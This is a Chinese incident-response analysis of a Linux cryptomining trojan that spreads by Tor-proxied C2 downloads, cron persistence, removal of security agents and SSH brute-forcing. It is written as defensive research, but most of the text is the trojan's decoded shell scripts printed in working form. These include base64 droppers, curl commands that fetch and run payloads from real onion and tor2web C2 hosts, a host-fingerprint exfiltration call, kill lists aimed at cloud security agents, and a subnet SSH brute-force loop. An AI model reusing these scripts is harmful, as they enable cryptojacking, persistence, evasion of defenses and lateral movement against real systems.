一、 背景
本次挖礦木馬的應急事件泌豆,配合老師給的信息定庵,結(jié)合動態(tài)分析、靜態(tài)分析的方法踪危,對該木馬進行了深入的分析蔬浙,初步判斷該木馬具有持久化、自保護贞远、內(nèi)網(wǎng)橫向移動(SSH爆破)等能力畴博,我們將木馬本體及后續(xù)通過tor代理下載得到的其他木馬腳本整理,對應功能及手法進行分析蓝仲,具體文檔如下俱病。
二、 木馬分析
原始拿到的木馬腳本為test.sh袱结。首先對test.sh腳本的靜態(tài)代碼審計分析(按照代碼執(zhí)行順序)
image
首先是設置了腳本執(zhí)行所需要的環(huán)境變量亮隙,以及定義了一些變量值,目的為在下邊的代碼邏輯里進行拼接垢夹。
image
sockz()函數(shù)是想通過doh來查詢ip溢吻,利用doh查ip的好處是提供加密保護dns查詢結(jié)果,既而可以繞過各大廠商IDS里面惡意域名的 IOC果元。其中紅框標注的dns.rubyfish.cn在國內(nèi)挖礦團隊里比較“活躍”促王,以下是微步在線的搜索結(jié)果:
image
初步判斷:該挖礦木馬是國內(nèi)的黑產(chǎn)團隊搞的。
image
fexe()函數(shù)比較簡單而晒,在幾個目錄路徑里尋找一個有讀寫權限的路徑蝇狼。
image
函數(shù)u()為該挖礦木馬的核心,首先生成了隨機文件名欣硼,然后通過socket5掛relay.tor2socks.in的代理訪問C&C域名题翰,relay.tor2socks.in是一個類似中轉(zhuǎn)網(wǎng)站的域名恶阴,這樣,C&C域名就不會直接出現(xiàn)在數(shù)據(jù)包頭豹障。根據(jù)設備的主機硬件名匹配下載了一個惡意文件/int.$(uname -m)冯事,然后執(zhí)行這個惡意文件并刪除該文件。在本腳本文件中血公,C&C域名為:
wacpnnso4ottxlyvjp2adaieaivxx2saxoymednidp3zyfoqfc5jpqad.onion
tor代理域名為:relay.tor2socks.in
進一步在在微步上查詢了該代理域名的詳細信息:
image
該腳本執(zhí)行的方式為crontab計劃任務執(zhí)行昵仅,其中變量r,即:
image
該變量記錄了目標主機的一些基本信息累魔,包括 ip地址摔笤、主機名、crontab內(nèi)容垦写。這里是 or 的關系当悔,推測是如果執(zhí)行失敗那就上報如上主機信息您单。
image
流程執(zhí)行的內(nèi)容就比較直觀了褂萧,根據(jù) pid 文件判斷程序是否啟動了沟涨,如果沒啟動,那么就啟動程序分蓖。
所以大致流程總結(jié)如下:
doh解析域名獲取tor代理ip ---> 查找目標主機可讀寫路徑 ---> 通過tor代理在c&c服務器上下載與目標主機硬件版本相匹配的惡意文件 ---> 在目標主機上開啟crontab計劃任務并執(zhí)行 ---> 在目標主機上根據(jù)pid文件返回腳本執(zhí)行結(jié)果并進行判斷尔艇。
收集得到可用tor做代理的ip如下:
image.png
2、對挖礦木馬函數(shù)u()的進一步分析
根據(jù)之前對test.sh腳本代碼的分析可知么鹤,函數(shù)u()腳本代碼通過tor代理在c2服務器上下載了木馬文件并保存到當前目錄下终娃,木馬文件命名取日期的md5相關值,且執(zhí)行木馬文件之后便立刻刪除了該木馬文件蒸甜。代碼回顧:
image
從c2服務器上下載并保存木馬文件棠耕,以供之后的反編譯分析使用。從c2服務器上下載下來的木馬文件如下:
image
執(zhí)行該木馬文件迅皇,結(jié)果如下:
(1)crontab定時任務增加了新的一項任務昧辽,并且在/root目錄下生成了該任務所執(zhí)行的新腳本文件:systemd-private-2OossFop8vSbHI1fjSzMJoolZfE29S.sh
image
進一步查看該新腳本文件:
image
中間的代碼片段用base64加密了衙熔,解密得:
image
新腳本文件的代碼內(nèi)容與原腳本文件test.sh代碼內(nèi)容進行對比后登颓,共有兩處不同:
1、在新腳本文件代碼片段的最前面加入了一串字符串红氯,且該字符串與新腳本文件名類似框咙。
2、新腳本文件中變量$t所指代的c2服務器域名前綴與原來不同
對于第一處不同的地方痢甘,作為在腳本文件中喇嘱,該處存在一處隨機字符串的解釋可能為該字符串是一個可執(zhí)行文件名,于是在系統(tǒng)中對該字符串進行了全局搜索:
image
由搜索結(jié)果發(fā)現(xiàn)塞栅,有三個備份的腳本文件者铜,作為后手存在于系統(tǒng)之中。
通過再次對test.sh腳本代碼的靜態(tài)分析可知,crontab任務并不是test.sh發(fā)出的作烟,而對crontab任務所執(zhí)行的腳本內(nèi)容分析可知愉粤,該新腳本文件與test.sh執(zhí)行的是相同的功能,即通過tor代理從c2服務器上down下木馬文件并執(zhí)行拿撩。crontab任務在這里起到了持久化的作用衣厘,即持續(xù)的從c2服務器上拉取命令。通過對該母體木馬文件反編譯如下:
將elf文件導入到IDA中發(fā)現(xiàn)压恒,函數(shù)列表與導入表都幾乎沒有顯示:
image
所以該木馬文件很可能是經(jīng)過加密的影暴,需要單步調(diào)試進行分析以獲取核心惡意代碼。
經(jīng)過dump之后探赫,跟之前的腳本類似型宙,在樣本中內(nèi)嵌了base64腳本,一共七段:
image
解碼后腳本代碼內(nèi)容以及各自所完成的功能如下:
image.png
image.png
image.png
具體分析如下:
持久化 1.sh:
C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
x() {
if ! ls $d/.systemd-private-*.sh; then
grep "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu" $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho QzBQZ0Z6MkpIY3Bzd1ZNT0s3WFNIUW9kRE9yQVdJS3UKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash" > $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
touch -r /bin/grep $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
chmod +x $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
fi
if ! ls /opt/systemd-private-*.sh; then
grep "C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu" /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu\necho QzBQZ0Z6MkpIY3Bzd1ZNT0s3WFNIUW9kRE9yQVdJS3UKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAid2FjcG5uc280b3R0eGx5dmpwMmFkYWllYWl2eHgyc2F4b3ltZWRuaWRwM3p5Zm9xZmM1anBxYWQiKQoKc29ja3ooKSB7Cm49KGRvaC50aGlzLndlYi5pZCBkb2gucG9zdC1mYWN0dW0udGsgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash" > /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
touch -r /bin/grep /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
chmod +x /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh
fi
if ! ls /etc/cron.d/0systemd-private-*; then
grep C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu || echo "$(echo $((RANDOM%59))) * * * * root /opt/systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh > /dev/null 2>&1 &" > /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
touch -r /bin/grep /etc/cron.d/0systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu
fi
if ! crontab -l | grep ^[0-9] | grep systemd-private; then
(echo "$(echo $((RANDOM%59))) * * * * $d/.systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh > /dev/null 2>&1 &";crontab -l|grep -v systemd-private-C0PgFz2JHcpswVMOK7XSHQodDOrAWIKu.sh)|crontab -
fi
}
功能:創(chuàng)建定時任務$d/.systemd-private-*.sh伦吠。定時任務的內(nèi)容解碼后如下早歇,功能為下載母體木馬int文件,以達到本機持久化的目的讨勤。
image
自保護箭跳、清除其他挖礦木馬2.sh:
2OossFop8vSbHI1fjSzMJoolZfE29S
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
find /etc/cron*|xargs chattr -i;find /var/spool/cron*|xargs chattr -i;chattr -i /etc/hosts
crontab -l ;grep -iRE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" /etc/cron.*|cut -f 1 -d :|xargs rm -f
crontab -l |grep -ivE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" |crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/pgsql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/postgresql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/log/postgresql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /etc/postgresql/"|crontab -
grep -q onion /etc/hosts && sed -i '/onion/d' /etc/hosts
grep -q tor2w /etc/hosts && sed -i '/tor2w/d' /etc/hosts
netstat -antp|grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199"|awk {'print $NF'} |cut -d/ -f1|xargs kill -9
pkill -9 -f "kthreaddi|defunct|./cron|./oka|\-unix|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliSecGuard|AliYunDun|descargars|Donald|HT8s|Jonason|steasec|salt-store|salt-minion|SzdXM|X13-unix|X17-unix|\[stea\]|aegis_|AliYunDun|AliHids|AliHips|AliYunDunUpdate|aliyun-service|azipl|bash64|bigd1ck|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|JavaUpdate|system-python3.8-Updates|java-c|kaudited|kdevtmpfsi|kerberods|khugepageds|kinsing|kintegrityds|kpsmouseds|swapd0|kswaped|knthread|kthreadds|kthrotlds|kw0|kworkerds|kworkre|kwroker|liog|lsof|lopata|Macron|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice|orgfs|pamdicks|pastebin|postgresq1|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|sysguerd|systeamd|systemd-network|sysupdate|sysupdata|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0|zsvc|pdefenderd|smcard2|rcu_sched"
ps x |grep -v grep|grep -E "kthreaddi|defunct|kinsing|kdevtmpfs|./oka|zsvc|pdefenderd|smcard2|swapd0|rcu_sched|AliSecGuard|AliYunDunUpdate|AliYunDun|aliyun-service|assist_daemon"|awk '{print $1}' |xargs -I % kill -9 %
ss -antp |grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|kinsing|kdevtmpfsi|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199" |awk -F, {'print $(NF-1)'}|sed 's/pid=//g' |xargs kill -9
rm -f $HOME/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh
rm -f /opt/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh
ps ax -o "pid %cpu cmd"|grep bash|awk '{if($2>=20.0) print $1}'|xargs kill -
功能:下載腳本卸載安防產(chǎn)品(其中阿里云的安騎士、騰訊云的云鏡等產(chǎn)品)潭千,同時修改hosts文件屏蔽其他挖礦網(wǎng)址以獨占挖礦資源谱姓。
下載bot腳本3.sh:
2OossFop8vSbHI1fjSzMJoolZfE29S
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4sSLkA- -m200")
t=$(echo "i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad")
sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
ibot() {
sockz
f=/bot
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -X POST -x socks5h://$s:9050 -e$r $t.onion$f || $c -X POST -e$r $1$f
}
ibot $t.tor2web.it || ibot $t.tor2web.in
功能:下載bot腳本文件。
目前文件鏈接已失效刨晴,無法down下來進行功能分析:
image
臨時文件權限鎖定4.sh:
chattr -i /tmp/.X11-unix
chattr -Ri /tmp/.X11-unix
[ -f /tmp/.X11-unix ] && rm -f /tmp/.X11-unix
[ -d /tmp/.X11-unix ] || mkdir -p /tmp/.X11-uni
功能:對臨時文件進行修改權限鎖定屉来。
ssh內(nèi)網(wǎng)暴力破解5.sh:
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
q=(
1
2
3
4
5
6
7
8
9
)
u(){
f=/${q[$((RANDOM%9))]}
x=./$(date|md5sum|cut -f1 -d-)
curl -4fsSLkA- -m200 $1$f -o$x
chmod +x $x;$x;rm -f $x
}
u mazeclmhbacucxin.tor2web.in
功能:下載ssh暴力破解的腳本,再由其從c2上拉取對應的ssh爆破木馬和密碼本以及其他功能性文件狈癞,對內(nèi)網(wǎng)開啟ssh服務的機器進行暴力破解茄靠。
腳本內(nèi)容如下(/8與/9文件內(nèi)容一致):
image
解碼得:
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd")
sockz() {
n=(doh.nl.ahadns.net dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.no.ahadns.net doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
iscn() {
ps aux | grep -v grep | grep tracepath | awk '{print $2}' | xargs kill -9 ; pkill -9 -f tracepath
if ! ss -antp |grep tracepath;then
f=/sshd
mkdir -p /tmp/.X11-unix/sshd && cd /tmp/.X11-unix/sshd || exit
($c -x socks5h://$s:9050 $t.onion$f -o-|| $c $1$f -o-)|tar xz
echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do ./ssh $i 22 root pw 222>/dev/null 2>&1;done' > r1
echo '[ -s ip ] && for i in $(cut -d" " -f1 ip|sort -R|head -20);do ./ssh $i 2222 root pw 222>/dev/null 2>&1;done' > r2
chmod +x *;ulimit -n 60000;>ip;touch -r ss r1 r2 ip
n1=$(ip a|awk {'print $2'}|grep ^10[.] |sort -R|head -1|cut -d. -f1,2)
n2=$(ip a|awk {'print $2'}|grep ^172[.][1-3]|sort -R|head -1|cut -d. -f1,2)
n3=$(ip a|awk {'print $2'}|grep ^192.168|sort -R|head -1|cut -d. -f1,2)
[ ! -z "$n3" ] && (./ss -r"OpenSSH" $n3.0.0/16 22 >ip;./r1)
[ ! -z "$n2" ] && (./ss -r"OpenSSH" $n2.0.0/16 22 >ip;./r1)
[ ! -z "$n1" ] && (./ss -r"OpenSSH" $n1.0.0/12 22 >ip;./r1)
#(./ss -r"OpenSSH" 192.168.0.0/16 22 >ip;./r1)
#(./ss -r"OpenSSH" 10.0.0.0/16 22 >ip;./r1)
#(./ss -r"OpenSSH" 172.16.0.0/12 22 >ip;./r1)
(./ss -r"OpenSSH" 10.$((RANDOM%255)).0.0/16 22 >ip;./r1)
cd;rm -rf /tmp/.X11-unix/sshd/
fi
}
sockz
iscn $t.tor2web.it &
通過tor代理,拉取/sshd的tar包解壓后內(nèi)容如下(pw+ss+ssh):
image
其中:
pw --> ssh爆破密碼字典
ss --> 模擬ss命令的腳本
ssh --> 改寫過的sshpass命令腳本
拉取木馬所需curl ss6.sh等工具:
function kurl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
